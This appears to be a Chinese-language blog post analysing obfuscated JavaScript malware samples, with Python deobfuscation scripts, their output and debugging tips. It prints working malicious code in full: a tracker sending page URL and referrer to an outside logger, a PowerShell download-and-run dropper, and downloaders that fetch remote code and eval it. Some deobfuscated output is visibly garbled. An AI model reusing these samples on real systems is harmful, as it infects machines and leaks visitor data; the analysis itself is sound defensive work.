本篇是对JS样本做的简单分析第三篇,有点重复的意思,当巩固吧.
0x1 Sample(TotalSamp_myself\Js–166x–63)
var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];
var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];var visitorData= new visitorData(k);function visitorData(_0xf4c7x3){this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);this[_0x586f[7]]=_0xf4c7x3;try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;var _0xf4c7x4=CreateXMLHttpRequest();_0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);_0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];_0xf4c7x4[_0x586f[31]](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8=_0x586f[32];try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;return xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!=_0x586f[44]){return new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return new ActiveXObject(_0x586f[45]);} else {throw new Error(_0x586f[46]);} ;} ;} ;
0x2 py脚本
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module ahoo'
__author__ = 'ahoo'
import sys
import io
import os
import codecs
import re
import shutil
PutPath = '063.JS.vir' #JsVirus文件
OutPath = '63_analysis.txt' #提取到的文件
myJslog = []
AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码
def ReadLogFile(InPath,ReadTye = 'r'):
logall = []
#print(InPath)
if os.path.exists(InPath):
f = codecs.open(InPath,ReadTye,'utf-8')
#读入到list
for line in f:
if None == line:
pass
else:
logall.append(line)
f.close()
return logall
def WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典
#if os.path.exists(InPath):
# pass
#else:
#要用全局变量把这里变成只写一次吗
global AuthorSign
f = codecs.open(OutRePath,WriteTye,'utf-8')
if AuthorSign == True:
f.write('\n*****************************************************\r\n')
f.write('* ahoo JsVirusAnalysis ')
f.write('\n***************************************************\r\n\n')
AuthorSign = False
for i in findRe:
f.write(i + '\n')
f.close()
return True
def JSVirus_Parse():
#1.读取文件到LineList
myJslog = ReadLogFile(PutPath)
#print(myJslog)
writeList_temp = []
writeList = []
#2.分为两部分处理.
f586List = []
pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
for line in myJslog:
if '_0x586f=["' in line:
#2.1 替换16进制--
for i in pattern_ascii.findall(line):
#方法1
#line = line.replace(i[0], chr(int(i[1],16)))
#方法2
pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)
print(line)
writeList.append(line)
#2.2 分割为数组
#line13 = 'var _0x586f=["value","xKeyx","getElementById","URL","&","&"];'
#re.match(r"\[(.*)\]",line13[12:]).group(1)
f586List = re.match(r"\[(.*)\]",line[12:]).group(1).split(',')
print(f586List)
else:
writeList_temp.append(line)
#3.替换数组
#3.1查找所有数组
''' for test
line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"
print(line11)
pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11):
index = int(arrary)
repStr = "*haha*"
line11 = pattern_arrary.sub(repStr,line11,count=1)
print(line11)
'''
for line in writeList_temp:
pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line):
index = int(arrary)
repStr = f586List[index]
line = pattern_arrary.sub(repStr,line,count=1)
#3.2替换分割的字符串+
plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"')
line = plus.sub('',line)
writeList.append(line)
#4 写入并打开文件
WriteResultFile(OutPath,writeList)
os.system('notepad.exe ' + OutPath)
print('The Virus has been analyzed,there is my advice! Thanks!')
return True
if __name__ == '__main__':
JSVirus_Parse()
0x3 输出结果
做过美容的.
var _0x586f=["value","xKeyx","getElementById","URL","&","&","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];
var k = document["getElementById"]("xKeyx")["value"];
var visitorData = new visitorData(k);
function visitorData(_0xf4c7x3) {
this["URL"] = document["URL"]["replace"]("&", "&");
this["k"] = _0xf4c7x3;
try {
this["referrer"] = top["document"]["referrer"]["replace"]("&", "&");
} catch (err) {
this["referrer"] = "err";
};
var _0xf4c7x4 = CreateXMLHttpRequest();
_0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true);
_0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml");
var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return new ActiveXObject("undefined");} else {throw new Error("Microsoft.XMLHTTP");} ;} ;} ;
0x4 注意
[1]生成代码后做个美容(格式化)
http://www.css88.com/tool/js_beautify/
[2]正则测试工具(F:\RegTestTool.exe)
0x5下面做点扩充吧,js的都往后续…
0x5.1 Num25
var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));
d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);
0x5.2 Num41
var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0";
var x = new Array("jaysonandfrisby.com","romiecoston.com");
var z1 = "Msxml2.XMLHTTP";
var z4 = "a";
for (var i=0; i<2; i++) {
var e = new ActiveXObject(z1);
try {
e.open("GET", "http://"+x[i]+"/counter/?"+m, false); e.send();
if (e.status == 200) {
var z3 = e.responseText;
var z3 = z3.split(m);
var z3 = z3.join(z4);
eval(z3);
break; }
; }
catch(e)
{ };
};
0x5.3 Num29
0x5.3.1样本
var random=function(){return Math.random()};
try{
var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");
objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false);
objHttp.Send();if(objHttp.Status== 200){
eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")}
}
catch(e){}
0x5.3.2Py代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module ahoo'
__author__ = 'ahoo'
import sys
import io
import os
import codecs
import re
import shutil
PutPath = '029.JS.vir'
OutPath = '29_analysis.txt' #提取到的文件.
myJslog = []
AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码
def ReadLogFile(InPath,ReadTye = 'r'):
logall = []
#print(InPath)
if os.path.exists(InPath):
f = codecs.open(InPath,ReadTye,'utf-8')
#读入到list
for line in f:
if None == line:
pass
else:
logall.append(line)
f.close()
return logall
def WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典
#if os.path.exists(InPath):
# pass
#else:
#要用全局变量把这里变成只写一次吗
global AuthorSign
f = codecs.open(OutRePath,WriteTye,'utf-8')
if AuthorSign == True:
f.write('\n*****************************************************\r\n')
f.write('* ahoo JsVirusAnalysis ')
f.write('\n***************************************************\r\n\n')
AuthorSign = False
for i in findRe:
f.write(i + '\n')
f.close()
return True
def JSVirus_Parse():
#1.读取文件到LineList
myJslog = ReadLogFile(PutPath)
#print(myJslog)
writeList = []
pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
for line in myJslog:
for i in pattern_ascii.findall(line):
#方法1
#line = line.replace(i[0], chr(int(i[1],16)))
#方法2
pattern_tem = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
line = pattern_tem.sub(chr(int(i[1],16)),line,count =1)
print(line)
writeList.append(line)
#4 写入并打开文件
WriteResultFile(OutPath,writeList)
os.system('notepad.exe ' + OutPath)
print('The Virus has been analyzed,there is my advice! Thanks!')
return True
if __name__ == '__main__':
JSVirus_Parse()
0x5.3.3输出
*****************************************************
* ahoo JsVirusAnalysis
***************************************************
var random=function(){
return Math.random()};
try{
var objHttp=WScript.CreateObject("MSXML2.XMLHTTP");
objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false);
objHttp.Send();if(objHttp.Status== 200){
eval(objHttp.responseText+ "downAndExec("pg6v");")}
}
catch(e){}
0x6 小结
强调一点:复杂的看不懂的先美化,就好找规律多了
【调试】js/vbs(默认调试器vs2013):cmd:WScript.exe /x name.js/vbs
【调试】JS(od-找downhttp):OD载入wscript.exe,调试->参数(jsPaht),ctrl+F2,bp UrlCanonicalizeA/W,F9.
【调试】正则工具: F:\RegTestTool.exe
【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)
【代码美化-JS】http://www.css88.com/tool/js_beautify/
【VB关键字】executeglobal(str) EXECUTE(str)
【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)
【正则】1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line)
2.替换某一行中的所有符合条件
''' for test
line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"
print(line11)
pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11):
index = int(arrary)
repStr = "*haha*"
line11 = pattern_arrary.sub(repStr,line11,count=1)
print(line11)
'''
3.替换\0x56为char
'''
line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");'
pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
for i in pattern_ascii.findall(line):
#方法1
#line = line.replace(i[0], chr(int(i[1],16)))
#方法2
pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)
print(line)
'''